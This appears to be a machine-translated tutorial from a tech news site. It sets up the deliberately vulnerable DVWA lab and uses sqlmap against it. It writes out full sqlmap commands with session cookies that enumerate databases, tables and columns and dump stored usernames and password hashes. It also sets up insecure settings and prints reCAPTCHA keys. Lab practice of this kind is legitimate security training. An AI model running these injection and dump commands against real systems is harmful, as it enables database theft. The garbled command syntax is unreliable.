In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-03 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >
Share
Shulou(Shulou.com)06/01 Report--
The following content mainly brings you the DVWA process of the test and exercise system. The knowledge mentioned here is slightly different from the books. It is summed up by professional and technical personnel in the process of contact with users, and has a certain value of experience sharing. I hope to bring help to the majority of readers.
Deploy DVWA, a test exercise system
1. Download the DVWA package
Official download address: http://www.dvwa.co.uk/, the latest version is: DVWA-1.9
Wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master
two。 Deploy the linux environment
Yum install-y httpd mysql mysql-server php php-mysql php-gd
3. Enable httpd and mysqld services
Service httpd start
Service mysqld start
4. Test the parsing of php by htttp. The browser accesses http://ip/test.php normally.
Vim / var/www/html/test.php
Write:
5. Change the password of mysql
Mysqladmin-uroot password "123456"
6. Extract the DVWA-1.9.zip to / var/www/html and change the owner to apache
Unzip DVWA-1.9.zip-d / var/www/html
Chown-R apache:apache / var/www/html/DVWA-1.9
7. Change the DVWA profile database password to 123456
Vim / var/www/html/DVWA-1.9/config/config.inc.php
Change the password:
$_ DVWA ['db_password'] =' 123456'
8. Enter the web installation interface of DVWA, http://ip/DVWA-1.9/setup.php, and report an error
Solution:
1) Edit the configuration file vim / etc/php.ini of php
Allow_url_include = On
2) Edit DVWA configuration file vim / var/www/html/DVWA-1.9/config/config.inc.php
Find the link to create the public key and private key: fill in the configuration file after applying for https://www.google.com/recaptcha/admin/create:
Public key: 6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb
Private key: 6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k
9. Restart http to make the modified configuration file effective, refresh the web interface, and eliminate errors
Service httpd restart
10. Click Create/Reset Database and automatically jump to the login screen. Default username / password: admin/password
At this point, DVWA has been deployed
Install the SQLmap vulnerability check tool
1. Official download: http://sqlmap.org/http://sqlmap.org/
Version: sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
two。 Extract the sqlmap and execute
Description: the tool is written in python, need to install python, it is not compiled language, but executive language, run directly
Command tar-zxvf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
Command. / sqlmap.py
3. Set command aliases, modify vim / etc/profile, and directly use the sqlmap command
Command alias sqlmap='python / usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'
Command source / etc/profile
III. Actual combat
Practice 1: enumerate usernames and passwords for login MYSQL data
Practice 2: enumerate all databases
Practice 3: enumerate the data tables of the specified database
Practice 4: get information about all columns in a specified database and table
Practice 5: enumerate all user names and passwords in the specified data table
Environmental preparation:
1) Log in to http://192.168.1.124/DVWA-1.9 and set the security level to the lowest
2) Open the Firefox browser TamperData plug-in and wait for the cookies value to be obtained.
3) in the [SQL Injection] item, the submission User ID is 22 (id=22 appears in the address bar, which is the injection point of MySQL)
Get the injection point: http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#
4) TamperData pop-up window to obtain cookies value: security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552
Practice 1: enumerate usernames and passwords for login MYSQL data
Sqlmap syntax parameters:
-u: specify the target URL, which is the injection point
-- cookies: cookies value of the current session
-b: get the database type and retrieve the database management system identity
-- current-db: get the current database
-- current-user: gets the user used by the current login database
Command:
Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-- cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-b-- current-db-- current-user
Description: reply Y according to the prompt and continue
Result: the current database is dawa and the user is root@localhost
Practice 2: enumerate all databases
Sqlmap syntax parameters:
-- users: enumerates database user names
-password: enumerates the passwords of database users (hash)
Command:
Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-string=" Surname "- users-password
Description: select the dictionary file under the directory and crack it violently.
Result: the user name of the database is root, and the password is also in plaintext form 123456
Practice 3: enumerate databases and data tables of specified databases
Sqlmap syntax parameters:
-- dbs: enumerates the current database
Command:
Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-- cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "--dbs
Result: all databases under mysql
Command:
Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "- D dvwa-- tables
Result: all the tables in the dvwa library
Practice 4: get information about all columns in a specified database and table
Sqlmap syntax parameters:
-D: specified database
-T: specify the data table in the database
-- columns: get column information
Command:
Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "- D dvwa-T users-- columns
Result: dvwa library, all field information in users table
Practice 5: enumerate all user names and passwords in the specified data table
Sqlmap syntax parameters:
-C: enumerate columns in the data table
-- dump: stores data table items
Command:
Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "- D dvwa-T users-C user,password-- dump
Result: dvwa library, user field and password field information in users table. Finally, the information in table is transferred to file.
For the above test drill system DVWA process, if you need to know more, you can continue to follow our industry promotion, if you need professional solutions, you can contact the pre-sales and after-sales on the official website. I hope this article can bring you some knowledge updates.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.